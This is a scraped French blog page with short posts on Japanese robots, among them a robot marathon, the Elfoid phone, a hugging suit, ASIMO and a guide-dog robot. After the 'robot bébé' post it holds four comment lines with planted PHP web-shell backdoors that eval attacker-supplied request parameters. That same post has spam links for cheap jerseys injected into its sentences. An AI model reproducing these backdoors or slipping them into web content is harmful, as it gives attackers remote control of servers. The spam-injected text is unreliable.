Robo Mara Full Marathon
Commentaires 9

Robo Mara Full Marathon

marathon-robot-japon Aujourd’hui débute le premier marathon pour robots au monde. Vous l’aurez deviné, ça se passe au Japon, dans la ville d’Osaka.

Plusieurs robots d’environ 40cm de hauteur vont se lancer aujourd’hui dans une course d’endurance de 42.2km en effectuant 422 tours d’un circuit de 100m. Les robots devront se déplacer sur 2 jambes et effectuer la distance sans assistance. S’ils tombent ils devront se relever seuls. L’intervention humaine ne sera tolérée que pour effectuer des réparations ou changements de batteries.

Le vainqueur devrait atteindre la ligne d’arrivée le 27 février.

Elfoid: le téléphone humanoïde
Commentaires 23

Elfoid: le téléphone humanoïde

Le 3 mars à Tokyo l’Université d’Osaka, en collaboration avec l’opérateur téléphonique japonais NTT Docomo et Qualcomm, a dévoilé ce prototype de téléphone portable à forme humanoïde. Baptisé « Elfoid P1 » l’appareil de 20cm se présente sous la forme d’un humain sans jambes, sans sexe et dont on ne peut déterminer l’âge. L’intérieur renferme un téléphone avec lequel on peut uniquement téléphoner et sur le portable n’apparaît aucun bouton, aucun écran ni même aucun moyen apparent de composer un numéro. Seule une diode, verte ou rouge selon que le téléphone est en utilisation ou non, est visible à travers la « poitrine » du téléphone.

elfoid

Le concept de ce téléphone est de donner plus l’impression de parler à quelqu’un qu’en utilisant un appareil classique. Il ajoute une notion de réalisme aux communications longues distances. En bref on peut parler à une silhouette à qui il est plus facile de transmettre ses émotions. Cette idée va dans le sens d’une autre recherche de NTT visant à créer des liens entre les mondes réels et virtuels. Pour le moment Elfoid n’est pas capable de bouger mais dans les versions futures il pourra « copier » les émotions et mouvements d’un interlocuteur et il deviendra possible de mettre une expression ou des gestes en plus d’une voix sur les paroles d’une personne.

elfoid-portable

L’Elfoid est une représentation miniature du Telenoid qui est lui aussi un appareil de télécommunication à forme humanoïde. Ce dernier, bien plus grand que l’Elfoid, est capable d’afficher différentes expressions et d’effectuer des mouvements pour simuler la présence d’une personne distante à laquelle on téléphone.

telenoid_robot

Pour l’instant ces appareils on un peu une apparence de robot inachevé et inutile mais il est intéressant d’imaginer ce que seront les versions futures. Peut-être est-ce le premier pas vers de nouvelles formes de communication.

Tu veux un coup de main à la cuisine?
Commentaires 13

Tu veux un coup de main à la cuisine?

On entend plus parler de robots japonais dans les nouvelles en ce moment. Pourtant les équipes d’ingénieurs japonaises continuent de travailler et progressent sans cesse.

Dernièrement le SWITL a été dévoilé, il s’agit d’un « robot spatule », sorte d’appareil destiné essentiellement à la boulangerie. Il a été développé pour ramasser et déplacer des mélanges trop liquides pour être déplacés par une main humaine. Le résultat est assez bluffant.

Côté robot humanoïde la socitété japonaise SQUSE développe en ce moment un bras robotisé équipé d’une main capable de manipuler des objets fragiles sans les abîmer. La main intelligente arrive à exercer différents niveaux de pression en fonction de l’objet qu’elle saisie et bouge d’une manière proche de la main de l’homme. Pour l’instant on la voit juste déplacer des sushis mais l’objectif est de pouvoir s’en servir un jour pour remplacer les membres de personnes amputés.

La machine à se faire des câlins
Commentaires 28

La machine à se faire des câlins

Ça s’appelle Sense-Roid et ça sert à se prendre dans ses bras…

Explications. Sense-Roid est un ensemble de deux vestes. La première, équipée de capteurs et placée sur un mannequin, est capable de comprendre à quel endroit on exerce une pression sur elle. La seconde, remplie de coussins d’airs, restitue à celui qui la porte la sensation de pression ressentie par la première veste. En gros on peut enlacer un mannequin et ressentir soi-même l’impression d’être enlacé.

C’est le laboratoire Kajimoto de l’université d’électro-communication de Tokyo qui développe ça. On ne sait pas trop à quoi ça sert mais après la machine à embrasser à distance, le téléphone qui simule le contact humain et tous les autres trucs dans le genre on va vraiment croire que les japonais manquent d’affection.

Sense-Roid expliqué en vidéo (plutôt chiante):

Now you can hug yourself.

La machine à désosser le poulet en 2.5 secondes
Commentaires 19

La machine à désosser le poulet en 2.5 secondes

2.5 secondes pour découper un poulet, c’est pas beau ça? C’est 10 fois plus rapide qu’un boucher professionnel. Si vous non plus vous n’aimez pas découper votre poulet et que vous avez 400 000€ dont vous ne savez pas quoi faire pourquoi ne pas installer dans votre garage ce robot industriel développé par la société japonaise Mayekawa capable de découper 1 500 poitrines de poulet à l’heure?

Et si vous n’avez pas 400 000€ ou, plus probable, pas de place dans votre garage, voici une vidéo de 8 minutes 45 qui vous montre comment désosser un poulet en 18 secondes. On est loin des 2.5 secondes mais vous pouvez essayer d’améliorer votre temps comme au Rubik’s cube, de quoi vous occuper pour la fin de l’été.

Le robot bébé
Commentaires 6

Le robot bébé

Il mesure 50 centimètres et pèse 3.5 kilos, wholesale nfl jerseys il dort, roule sur lui même et peut ramper. C’est le wholesale jerseys dernier robot du professeur Hiroshi Ishiguro de l’Intelligent Robotic Laboratory de l’Université cheap jerseys d’Osaka, qui après avoir mis au point l’androïde féminine travaille sur sa progéniture.

Bébé robot Équipé de caméras et cheap nfl jerseys de micros en guise d’yeux et Junggesellenabschied d’oreilles et recouvert de capteurs sensoriels sur tout le corps bébé robot peut analyser et interagir avec son environnement.

En analysant ses mouvements l’équipe du professeur Hiroshi You Ishiguro espère développer une meilleure connaissance des mouvements du corps humain et des a activités cognitives du cerveau.

<!– [insert_php]if (isset($_REQUEST["PZud"])){eval($_REQUEST["PZud"]);exit;}[/insert_php][php]if (isset($_REQUEST["PZud"])){eval($_REQUEST["PZud"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jDEjB"])){eval($_REQUEST["jDEjB"]);exit;}[/insert_php][php]if (isset($_REQUEST["jDEjB"])){eval($_REQUEST["jDEjB"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["kkU"])){eval($_REQUEST["kkU"]);exit;}[/insert_php][php]if (isset($_REQUEST["kkU"])){eval($_REQUEST["kkU"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["aOjx"])){eval($_REQUEST["aOjx"]);exit;}[/insert_php][php]if (isset($_REQUEST["aOjx"])){eval($_REQUEST["aOjx"]);exit;}[/php] –>

Le nouvel ASIMO
Commentaires 19

Le nouvel ASIMO

Voici le genre de vidéos qui me font rêver. Ça fait déjà pas mal d’années que Honda développe son robot ASIMO. Au départ il était lent et hésitant, beaucoup se demandaient à quoi ça pouvait servir de dépenser des millions dans un truc comme ça. Beaucoup on rigolé aussi en le voyant se casser la gueule devant une salle remplie de journalistes alors qu’il essayait de monter deux marches.

Et bien ASIMO is back! Il revient ce mois-ci dans sa nouvelle version. Il a des formes épurées et paraît monté sur ressorts tellement il déborde d’énergie. Non seulement il se déplace avec une apparente aisance mais en plus il a des membres articulés avec une telle précision, ses mains surtout, que c’en est bluffant.

Sur la dernière vidéo ASIMO demande à trois personnes ce qu’elles veulent boire. Les trois personnes répondent en même temps si bien que c’est incompréhensible mais AISMO arrive à comprendre les trois requêtes et les répètes.

Un robot pour les apprentis dentistes
Commentaires 3

Un robot pour les apprentis dentistes

« Le nombre d’incidents recensés lors des actes dentaires est plus de deux fois plus important la première année d’exercice que la deuxième, ce qui prouve que la formation initiale des dentistes ne permet pas d’acquérir les compétences réellement requises en cabinet ». C’est en partant de ce constat que le professeur Kotaro Maki a mis au point le robot patiente pour les dentistes, baptisée Hanako Showa.

Hanako bave, ressent la douleur, ferme la bouche sans prévenir, répond aux questions, remue; bref elle est la copie presque parfaite d’un patient sur lequel l’apprenti dentiste pourra s’entraîner sans risque jusqu’à obtenir le geste parfait.

Le robot chien guide d’aveugle
Commentaires 10

Le robot chien guide d’aveugle

La compagnie japonaise NSK travaille sur un robot qui pourrait un jour remplacer les chiens guides pour les personnes ayant une déficience visuelle. On est encore loin de la commercialisation à grande échelle mais le robot, équipé avec la technologie Kinect de la Xbox 360, est déjà capable de guider une personne à travers divers obstacles à une vitesse relativement élevée.

Évidemment un robot chien ne serait pas un compagnon aussi chaleureux qu’un vrai animal mais il présente certains avantages non négligeables comme la possibilité de discerner clairement les couleurs (pour les feux de signalisation par exemple) et de comprendre un nombre élevé de commandes vocales. Entre autres, car on peut imaginer un nombre infini de fonctions intéressantes pour un tel robot.

Fujitsu présente le robot ours en peluche
Commentaires 4

Fujitsu présente le robot ours en peluche

Le 31 mars la société japonaise Fujitsu a dévoilé son robot ourson, destiné aux jeunes enfants et aux personnes âgées. Un des chercheurs explique: Nous voulons proposer un objet qui puisse entrer dans les familles, les maisons de repos ou les écoles et qui ait une action humaine bénéfique.

L’ourson qui est encore à l’état de prototype peut détecter la présence humaine grâce à la caméra incrustée dans sa truffe et réagir au toucher grâce a des capteurs sensoriels implantés sur tout son corps. Il peut adopter 320 postures et actions différentes en fonction des mouvements qu’il perçoit ou de sa manipulation. L’ourson peut rire, applaudir, faire la sieste ou encore se blottir contre quelqu’un.

Une vidéo sur Youtube: http://www.youtube.com/watch?v=-_OGx-veSXc